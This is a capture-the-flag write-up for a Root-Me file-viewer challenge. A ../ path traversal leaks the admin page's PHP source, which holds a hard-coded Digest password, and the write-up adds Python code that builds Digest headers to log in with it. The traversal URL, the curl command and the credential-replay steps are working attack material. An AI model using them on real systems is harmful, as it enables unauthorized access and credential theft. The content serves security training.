Rootme LFI Abbreviated
Our goal is to get to the admin section.
When we open the challenge page we are greeted by a “File viewer” with a few categories, each holding some files. Browsing into a category puts its name straight into the URL, and that parameter is what we can start playing with:
http://challenge01.root-me.org/web-serveur/ch16/?files=sysadm
We need to reach the admin section, and we know its URL is http://challenge01.root-me.org/web-serveur/ch16/admin/ (which, as the leaked source below confirms, sits behind HTTP Digest authentication). Since the files parameter is a directory name, we can try stepping up one level with ../:
http://challenge01.root-me.org/web-serveur/ch16/?files=../admin
There is a single file inside, index.php. Fetching it through the viewer (quote the URL, otherwise the shell treats the & as a job separator and never sends f=index.php):
curl 'http://challenge01.root-me.org/web-serveur/ch16/?files=../admin&f=index.php'
<h1>File viewer v 0.01</h1><span id="mnenu"/> | <span>
<a href="?files=sysadm">sysadm</a></span> | <span>
<a href="?files=reseau">reseau</a></span> | <span>
<a href="?files=esprit">esprit</a></span> | <span>
<a href="?files=crypto">crypto</a></span> | <span>
<a href="?files=coding">coding</a></span> | <span>
<a href="?files=archives">archives</a></span> |
<span style='text-align: right; float:right;'>Connected as : <b>guest</b> |
<a href="admin/">admin</a></span><br/><hr/><table id="content"><tr><td style="vertical-align: top;">
<a href="?files=../admin&f=index.php" ><img width="32px" height="32px" src="text.gif" alt="index.php">index.php</a><br/></td>
<td style="vertical-align: top;"></td></tr></table></body></html>
<pre><?php
function http_digest_parse($txt)
{
$needed_parts = array('nonce'=>1, 'nc'=>1, 'cnonce'=>1, 'qop'=>1, 'username'=>1, 'uri'=>1, 'response'=>1);
$data = array();
$keys = implode('|', array_keys($needed_parts));
preg_match_all('@(' . $keys . ')=(?:([\'"])([^\2]+?)\2|([^\s,]+))@', $txt, $matches, PREG_SET_ORDER);
foreach ($matches as $m) {
$data[$m[1]] = $m[3] ? $m[3] : $m[4];
unset($needed_parts[$m[1]]);
}
return $needed_parts ? false : $data;
}
function auth($realm){
header('HTTP/1.1 401 Unauthorized');
header('WWW-Authenticate: Digest realm="'.$realm.'",qop="auth",nonce="'.uniqid().'",opaque="'.md5($realm).'"');
die($realm);
}
$realm = 'PHP Restricted area';
$users = array('admin' => 'OpbNJ60xYpvAQU8');
if (empty($_SERVER['PHP_AUTH_DIGEST'])) {
auth($realm);
}
if (!($data = http_digest_parse($_SERVER['PHP_AUTH_DIGEST'])) || !isset($users[$data['username']]))
auth($realm);
$A1 = md5($data['username'] . ':' . $realm . ':' . $users[$data['username']]);
$A2 = md5($_SERVER['REQUEST_METHOD'].':'.$data['uri']);
$valid_response = md5($A1.':'.$data['nonce'].':'.$data['nc'].':'.$data['cnonce'].':'.$data['qop'].':'.$A2);
if ($data['response'] != $valid_response)
auth($realm);
echo "<html>
<head></head>
<body>
<h3>You could use this password to validate the challenge !</h3>
</body>
</html>";
?></pre><hr/></td></tr></table></body></html>
The admin password is hard-coded in the source: OpbNJ60xYpvAQU8. That is the value the challenge asks for. Note what made it readable: the viewer opens the requested file and prints it inside <pre> instead of executing it, so a PHP file reached through ../ is disclosed as source, and the Digest authentication protecting admin/ is never consulted.
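To see what the leaked admin/index.php actually verifies, and to use the recovered password against the Digest-protected admin/ without a library doing it for you, here is an added example in Python (not code from the challenge or from root-me) that implements both sides of the exchange: the client's Authorization header and the server's validation in the same order and with the same MD5 arithmetic as the PHP above. The nonce, opaque and cnonce values used in the demonstration are constructed; the parser keeps http_digest_parse()'s contract but is a cleaner rewrite, not a literal port of its regex.

```python
import hashlib
import hmac
import re
import secrets

REALM = "PHP Restricted area"
# The same table the leaked admin/index.php carries; the value is the password
# disclosed through the traversal.
USERS = {"admin": "OpbNJ60xYpvAQU8"}
NEEDED = ("nonce", "nc", "cnonce", "qop", "username", "uri", "response")


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, password, method, uri, nonce, nc, cnonce,
                    qop="auth", realm=REALM) -> str:
    """RFC 2617 Digest with qop=auth, the exact arithmetic of the leaked index.php:
    response = MD5(MD5(user:realm:pass):nonce:nc:cnonce:qop:MD5(method:uri))."""
    a1 = _md5(f"{username}:{realm}:{password}")
    a2 = _md5(f"{method}:{uri}")
    return _md5(f"{a1}:{nonce}:{nc}:{cnonce}:{qop}:{a2}")


def build_authorization(username, password, method, uri, nonce, opaque,
                        nc="00000001", cnonce=None, realm=REALM) -> str:
    """Client side: the Authorization header answering the server's 401 challenge."""
    cnonce = cnonce or secrets.token_hex(8)
    response = digest_response(username, password, method, uri, nonce, nc, cnonce, "auth", realm)
    fields = [
        f'username="{username}"', f'realm="{realm}"', f'nonce="{nonce}"', f'uri="{uri}"',
        "qop=auth", f"nc={nc}", f'cnonce="{cnonce}"', f'response="{response}"', f'opaque="{opaque}"',
    ]
    return "Digest " + ", ".join(fields)


def parse_digest(txt: str):
    """Same contract as the page's http_digest_parse(): the seven required
    fields as a dict, or None if any is missing."""
    data = {}
    for m in re.finditer(r'(\w+)=(?:"([^"]*)"|([^\s,]+))', txt):
        key, quoted, bare = m.groups()
        if key in NEEDED:
            data[key] = quoted if quoted is not None else bare
    return data if all(k in data for k in NEEDED) else None


def server_accepts(authorization: str, method: str, users=USERS, realm=REALM) -> bool:
    """Server side, step for step as the leaked index.php checks it. The uri fed
    into A2 is taken from the client's header, as the PHP does."""
    scheme, _, params = authorization.partition(" ")
    if scheme != "Digest":
        return False
    data = parse_digest(params)
    if data is None or data["username"] not in users:
        return False
    expected = digest_response(data["username"], users[data["username"]], method,
                               data["uri"], data["nonce"], data["nc"],
                               data["cnonce"], data["qop"], realm)
    # The PHP uses a loose != here; a constant-time comparison is the safer choice.
    return hmac.compare_digest(expected, data["response"])


if __name__ == "__main__":
    # Constructed challenge values; a real server sends nonce and opaque in its
    # WWW-Authenticate header (the PHP uses uniqid() and md5(realm)).
    nonce, opaque = "64f1c2a9b3d7e", _md5(REALM)
    uri = "/web-serveur/ch16/admin/"
    header = build_authorization("admin", USERS["admin"], "GET", uri, nonce, opaque)
    print(header)
    print("server accepts:", server_accepts(header, "GET"))
```

Against the live challenge you would first request admin/, copy nonce and opaque out of the 401's WWW-Authenticate header, build the Authorization header with build_authorization, and resend the GET with it; the server's check is digest_response recomputed with its stored password, so only the correct password produces a matching response.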